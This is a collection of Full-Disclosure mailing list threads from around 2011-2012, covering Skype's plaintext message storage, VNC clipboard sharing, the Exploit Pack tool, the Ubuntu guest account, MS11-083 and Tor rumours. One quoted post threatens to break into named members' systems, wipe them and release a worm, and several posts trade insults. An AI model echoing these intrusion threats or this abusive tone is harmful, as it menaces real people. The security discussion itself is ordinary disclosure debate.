3. To delete your conversation history, click Clear history. This removes your entire history, including instant messages, calls, voicemails, text messages, sent and received files. If you delete your conversation history, you cannot recover it. This sounds safely, but in fact Skype stored all incoming and outgoing chat messages into local sqlite3 DB (file main.db, table Messages), in plain text. Even if Keep history for-no history option in Settings-Security is enabled, Skype write all your data into Messages table, but executes delete * from Messages after program exit. This command will destroy messages at logical level in DB, but in fact, in physical level all messages data stay alive (blocks in the DB file only marks as destroyed), and simply can be recovered even with text editor (as mentioned above, it is stored in plain text). Proof of Concept: = In Windows XP, go to C:\Documents and Settings\%user name%\Application Data\Skype\%Skype user name% and open file main.db with text editor. All the ducks inside. Credits: Anonymous ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Pack - New video - Ultimate 2.1
I fear the day when he finally succeeds in making enough people believe he's a real security researcher. I wish attrition.org did a piece on him in the charlatans section. 2012/1/30 Peter Osterberg j...@vel.nu: This is Juan Sacco's new spam puppet. He just posted the same thing using his real name elsewhere. nore...@exploitpack.com skrev: Exploit Pack - New video! Release - Ultimate 2.1 Check it out! http://www.youtube.com/watch?v=4TrsFry13TU Exploit Pack Team http://exploitpack.com Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. That is *precisely* what VNC is: an open-source IP KVM. No, it's not. I won't go into the differences because other people already did in this thread. And please don't turn this into you're stupid, because I've seen others with the same setup. As mentioned, I know of a government agency with highly competent IT staff who had a similar setup: normal and sensitive work is on the desktop/notebook and Internet access (which is considered insecure) is on a remote machine, with a viewer on the desktop. That proves nothing. For example, there are many SCADA devices owned by government agencies connected to the Internet, but that doesn't mean it's a good idea to do so. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Fair enough :) On Wed, Jan 25, 2012 at 10:59 AM, Peter Osterberg j...@vel.nu wrote: On 01/25/2012 10:54 AM, Mario Vilas wrote: The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. That may very well be true. I am not trying to debate that. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On Tue, Jan 24, 2012 at 2:34 PM, Ben Bucksch n...@bucksch.org wrote: Actual result: notepad.exe shows My password Expected result: Nothing. No. Expected result is to have the clipboard text sent to the remote machine, if you have your client configured to do so. In a really security sensitive environment you wouldn't be using the clipboard for passwords anyway. Or you would disable clipboard sharing. Or you wouldn't use a cleartext protocol to begin with. You might as well report that if the user copies the password to the clipboard at any other point during the session it also gets sent to the server. I don't see why this should be the concern of the developers of any VNC client. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. On top of that, the attack scenario doesn't sound too good either. I fail to see why would you need to copypaste a password to access an untrusted machine and then worry that machine might get to see the password to itself. Also,most VNC servers store the password in clear text in the configuration, and the entire protocol is in plain text, for crying out loud. A scenario where this could be a problem is so bizarre I sincerely can't blame the -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Pack - Happy new year!
Just out of curiosity, exactly how do you measure that? On Wed, Jan 18, 2012 at 8:25 PM, nore...@exploitpack.com wrote: +20k active users -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OFF-Spanish content: CURSO WEB HACKING ONLINE GRATUITO.
50 US dollars per student just to pay for the video streaming? I have a hard time believing that. 2012/1/3 runlvl run...@gmail.com: Costo: 50 usd ( Para pagar streaming ) -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
On Fri, Dec 2, 2011 at 3:05 AM, adam a...@papsy.net wrote: C:\Users\adam\Desktopls -la combined.zip | gawk {print $5} *31337*317 That's a funny coincidence. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Indeed, Juan Sacco is the author. It's pretty clear from the about page on the site, and the whois record on the domain. I don't think it's meant to be a secret. Now, I know his track record on this list is less than ideal, but let's try to be professional and wait for the source code to show up before criticizing it. :) On Thu, Dec 1, 2011 at 5:11 AM, Stefan Edwards saedwards@gmail.comwrote: From one of the earlier emails to the list: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a... On Wed, Nov 30, 2011 at 10:58 PM, Gino g...@1337.io wrote: Seems to have Juan Succo written all over it On 11/30/11 1:49 AM, Mario Vilas wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com mailto:nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg Download it directly from the main site: http://www.exploitpack.com We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Q. How many Prolog programmers does it take to change a lightbulb? A. No. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg Download it directly from the main site: http://www.exploitpack.com We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NEVER AGAIN
I'd love to know what number he called. Or at least what country+area code. On Tue, Nov 22, 2011 at 11:34 PM, root ro...@fibertel.com.ar wrote: Please call again I didn't get it. Sure you have my number right? btw, chill man! On 11/22/2011 04:48 AM, xD 0x41 wrote: You fucking pieces of shit forget when it was once me who was asking, for help in regards to mutiple things, and when offered NONE, in regards to code i later had to find thanks to fucking blakhatz, why the fuck would i want or care for this list now, forget any competition i ever started, you clearly want, and, forget to see, even when it maybe something small for YOU, it maybe NOT for me, yet, i am hit from every side, nonstop about shit, wich i KNOW there is plenty of you who also have these codes, and thats exactly why your stfu and lettin me cop it.Seriously, when i was the one askin , i made NO big deal, when i was mutiple times confronted with exactly how i acted, and that was simply to NOT show things, because i did this per person basis, if i knew i could trust, then they were shown things..and they will always be shown things, as they remain friends.. the rest of you who shot your mouths of, watch the hell out, coz you may find a new user on your system soon called 'arsehole' and all he wants todo is get root, sdo he can rm it. a nice fuckign wurm you all deserve... harvesting of your domains, those who spoke out and, bombed me for shitall, and helped me not one bit when i had my ass on the line for shit like freepbx :s screw this list, believe it, i will root the people who annoyed me, one by one, and yes, ill FD that. now, fuck you all, except the very few, who know who they are . the rest of you who ignored me, and now dare to backlash chat me about a crappy bash 0day you DONT have,. go fk yourselfs, and for valdis, i hope your vt.edu, has a whole slew of new users you suckm as any kind of friend or moderator your also, the BIGGEST liar, who cannot code a thing, on this fucking list. dick. as for root@fibertel, indeed stfu, it was me on the ophone, just know that, your job is gone. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
Let's not overreact. We're talking about a guest account only on dekstop systems, for local login only, and perfectly visible to the user. The only problem I see here is not having a simple GUI way to disable the guest login for a non tech-savvy user, but no more. (Or am I missing something here?) On Thu, Nov 17, 2011 at 9:52 PM, Olivier feui...@bibibox.fr wrote: On 11/17/2011 08:34 PM, Ryan Dewhurst wrote: Are there any other services this may effect? The question could also be how many features like this are (will be?) silently enabled by default on new Ubuntu systems. Perfect for business use, Ubuntu is safe, intuitive and stable -- http://www.ubuntu.com/business Ubuntu is clearly no more recommended for business use. End users will have to become security experts to avoid teenager's attacks ... shameful On Thu, Nov 17, 2011 at 7:18 PM, Andrew N Dowden andrew_dow...@softdesign.net.nz mailto:andrew_dow...@softdesign.net.nz wrote: On 18/11/11 23:46, Larry W. Cashdollar wrote: Anyone know what the default is for Ubuntu 11 PermitEmptyPasswords no PasswordAuthentication no in /etc/ssh/sshd_config? for Ubuntu 11.10 (Oneiric) snip: ( from */etc/ssh/sshd_config* ) -- # To enable empty passwords, change to yes (NOT RECOMMENDED) PermitEmptyPasswords no -- # Change to no to disable tunnelled clear text passwords #PasswordAuthentication yes -- -- Olivier ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
The guest account has no password, but it's not possible to login remotely with ssh. On Thu, Nov 17, 2011 at 5:28 PM, Dave m...@propergander.org.uk wrote: Hi, What is the password for this guest account? Is the password random generated? Is remote access of any kind enabled by default for this guest account? In what way is the guest account different from any of the half dozen or so other accounts(with the obvious exception of access rights) created during a default Ubuntu install? How insecure is it really? I am not an Ubuntu expert so these are genuine questions, I am far to busy to research this at this time so I ask these questions in the hope than an Ubuntu Guru comes forth and either allays all my/your/our fears(if they exist) or scares me/us into action. regards Dave -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
I've used Impacket to craft raw packets of all kinds. Then again I don't know if that counts - used to work at Core at the time, so it was pretty much the only choice due to licensing issues with other libraries. I don't mean to say it's a bad tool to work with, not at all. I happen to prefer the newer Scapy, but it's just a matter of personal taste. :) On Sat, Nov 12, 2011 at 6:53 AM, Antony widmal antony.wid...@gmail.comwrote: Dear Dan, Impacket was at first a Pysmb copy/update from Core Security in order to play with RPC. (look at the source) They've done some work on pysmb library in order to implement DCE/RPC functionality in this dinosaurus lib. Saying that we should use Impacket in order to craft *raw* UDP packet is definitively the dumbest thing I've heard today. Seriously. Anyone can confirm that ? Mario ? Carlos ? Anyways, This guy doesn't understand shit, talks a lot about shit he doesn't know about, why would you even spend time reading his shit ? This vulnerability is about sending a *huge fucking* stream of UDP packets on a closed port in order to trigger a int overflow via a ref count. Most of the people here didn't even understand what we are talking about/dealing with. Anyways, it's probably time for you to unsubscribe since you don't follow and S-K's like sec...@gmail.com are trying to act like they know. Yeah right, a UDP int overflow triggered via a refcount UDP overflow that you can trigger with 1 single TCP (with the right ACK) packet is the way to go. This mailing list is getting gay, seriously. Cheers, Antony. On Fri, Nov 11, 2011 at 3:10 PM, Dan Ballance tzewang.do...@gmail.comwrote: Okay, now I'm confused! From http://oss.coresecurity.com/projects/impacket.html Impacket is a collection of Python classes focused on providing access to network packets. Impacket allows Python developers to craft and decode network packets in simple and consistent manner. It includes support for low-level protocols such as IP, UDP and TCP, as well as higher-level protocols such as NMB and SMB. Impacket is highly effective when used in conjunction with a packet capture utility or package such as Pcapyhttp://oss.coresecurity.com/projects/pcapy.html. Packets can be constructed from scratch, as well as parsed from raw data. Furthermore, the object oriented API makes it simple to work with deep protocol hierarchies. Thanks for your input Antony. Can you explain why impacket has nothing to do with crafting UDP packets? Fascinating thread this. Thanks to all!! dan :) On 11 November 2011 22:42, Antony widmal antony.wid...@gmail.comwrote: You are definitely a lamer secn3t. Also for you little brain, impacket has nothing to do with crafting UDP packets.. Thanks for proving this again and again. On Fri, Nov 11, 2011 at 2:36 PM, xD 0x41 sec...@gmail.com wrote: well look at that :P not same author but , nice coding predelka! good one, i will add you to crazycoders.com coderslist... i guess there is a few codes you have now done wich might be useful... cheers. xd On 12 November 2011 05:43, Ryan Dewhurst ryandewhu...@gmail.com wrote: An attempt at a possible MS11-083 DoS/PoC exploit, by @hackerfantastic: http://pastebin.com/fjZ1k0fi On Fri, Nov 11, 2011 at 5:08 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Yeah, I gotta say, I’m going to use it at some point ;) From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Mario Vilas Sent: Friday, November 11, 2011 9:02 AM To: Ryan Dewhurst Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516) I liked the heavy breather in the perv closet bit. On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.com wrote: I think Jon just said what everyone else was thinking, he said what I was thinking at least. On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote: On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote: About the PPS, i think thats a very bad summary of the exploit, 49days to send a packet, my butt. There is many people assuming wrong things, when it can be done with seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in real world botnet, yes then, with tcpip patchers, like somany ppl i know myself, even use (tcpipz)patcher ) , wich rocks... and it is ONLY one wich actually works, when you maybe modify the src so the sys file, is dropped from within a .cpp file, well thats up to you but thats better way to make it work, this will open sockets/threads, as i could, easily proove with one exe, but, the goal is, to trigger the vuln then exploit it, less than 49days :P , so , iguess
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
I liked the heavy breather in the perv closet bit. On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.comwrote: I think Jon just said what everyone else was thinking, he said what I was thinking at least. On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote: On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote: About the PPS, i think thats a very bad summary of the exploit, 49days to send a packet, my butt. There is many people assuming wrong things, when it can be done with seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in real world botnet, yes then, with tcpip patchers, like somany ppl i know myself, even use (tcpipz)patcher ) , wich rocks... and it is ONLY one wich actually works, when you maybe modify the src so the sys file, is dropped from within a .cpp file, well thats up to you but thats better way to make it work, this will open sockets/threads, as i could, easily proove with one exe, but, the goal is, to trigger the vuln then exploit it, less than 49days :P , so , iguess if this exploit, in real form, gathered 2 million hosts over 3 nights.. i guessing that the exploit, could possibly be triggered with ONE properly setup packet.. people forget that, a packet is one thing, and a crafted UDP packet, is quite another.. I'd really like to see you actually explain this bug with code. Either with a poc or with the disassembly. You seem to act like you know what's going on, but so far your description has been off base (from what I can make of your writing). No one cares about paragraphs of speculation and bragging, code or you are just another heavy breather in the perv closet of FD. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
I have no doubt that a lot of things are lost on you. On Fri, Nov 11, 2011 at 11:23 PM, xD 0x41 sec...@gmail.com wrote: are you braindead ? your humor, is really lost on me..so, i think, look within :P On 12 November 2011 04:01, Mario Vilas mvi...@gmail.com wrote: I liked the heavy breather in the perv closet bit. On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.com wrote: I think Jon just said what everyone else was thinking, he said what I was thinking at least. On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote: On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote: About the PPS, i think thats a very bad summary of the exploit, 49days to send a packet, my butt. There is many people assuming wrong things, when it can be done with seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in real world botnet, yes then, with tcpip patchers, like somany ppl i know myself, even use (tcpipz)patcher ) , wich rocks... and it is ONLY one wich actually works, when you maybe modify the src so the sys file, is dropped from within a .cpp file, well thats up to you but thats better way to make it work, this will open sockets/threads, as i could, easily proove with one exe, but, the goal is, to trigger the vuln then exploit it, less than 49days :P , so , iguess if this exploit, in real form, gathered 2 million hosts over 3 nights.. i guessing that the exploit, could possibly be triggered with ONE properly setup packet.. people forget that, a packet is one thing, and a crafted UDP packet, is quite another.. I'd really like to see you actually explain this bug with code. Either with a poc or with the disassembly. You seem to act like you know what's going on, but so far your description has been off base (from what I can make of your writing). No one cares about paragraphs of speculation and bragging, code or you are just another heavy breather in the perv closet of FD. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
Did you read the comments? On Fri, Oct 28, 2011 at 3:36 PM, Leon Kaiser litera...@gmail.com wrote: ** Bravo! A completely impartial source. -- *Leon Kaiser* - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr http://gnaa.eu || http://security.goatse.fr 7BEECD8D FCBED526 F7960173 459111CE F01F9923http://pgp.mit.edu:11371/pks/lookup?op=vindexfingerprint=onsearch=0x459111CEF01F9923 The mask of anonymity is not intensely constructive. -- Andrew weev Auernheimer On Fri, 2011-10-28 at 11:58 +0200, Lucas wrote: *Rumors of Tor's compromise are greatly exaggerated :* https://blog.torproject.org/blog/rumors-tors-compromise-are-greatly-exaggerated ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
On Fri, Oct 28, 2011 at 8:02 PM, Leon Kaiser litera...@gmail.com wrote: ** Did you not hear me when I said I don't do blogs? Hardly anyone heard you, unless they were in the same room as you. Some of us read you, though. It's a good thing you know, reading. You should try sometime. By the way, have you heard of the Internet, grandpa? I hear it's all the rage nowadays. They say it's even better than Fidonet! -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
I also got that impression :( where is that clarified? On Mon, Oct 24, 2011 at 6:13 PM, char...@funkymunkey.com wrote: Withdrawn :P Quoting char...@funkymunkey.com: I got the impression that they have fully compromised the actual TOR network, not a dummy network, am I wrong? Charlie Quoting Travis Biehn tbi...@gmail.com: So they put up a fake network, 'hacked' most of the nodes, and with complete control of their dummy network they were able to figure out traffic movement? This is news why? -Travis On Mon, Oct 24, 2011 at 10:31 AM, Mohit Kumar thehackern...@gmail.comwrote: French researchers from ESIEAhttp://www.esiea.fr/c/en/Web.Esiea.Public.cuke?, a French engineering school, have found and exploited some serious vulnerabilities in the TOR network. They performed an inventory of the network, finding 6,000 machines, many of whose IPs are accessible publicly and directly with the system?s source code. They demonstrated that it is possible to take control of the network and read all the messages that circulate. But there are also hidden nodes, the Tor Bridges, which are provided by the system that in some cases. Researchers have developed a script that, once again, to identify them. They found 181. *We now have a complete picture of the topography of Tor*, said Eric Filiol. Read More at The Hacker News -- http://thehackernews.com/2011/10/tor-anonymizing-network-compromised-by.html -- *Regards,* *Owner,* *The Hacker News http://www.thehackernews.com/* *Truth is the most Powerful weapon against Injustice.* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | TravisBiehn.comhttp://www.travisbiehn.com --- This message was sent from the FunkyMunkey mail server (mail.funkymunkey.co.uk) If you have any queries/complaints regarding mail sent from this server please direct them to ad...@funkymunkey.com --- This message was sent from the FunkyMunkey mail server (mail.funkymunkey.co.uk) If you have any queries/complaints regarding mail sent from this server please direct them to ad...@funkymunkey.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
On Thu, Oct 6, 2011 at 5:34 AM, root ro...@fibertel.com.ar wrote: do not harass people who are writing software for free Oh, that's rich. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
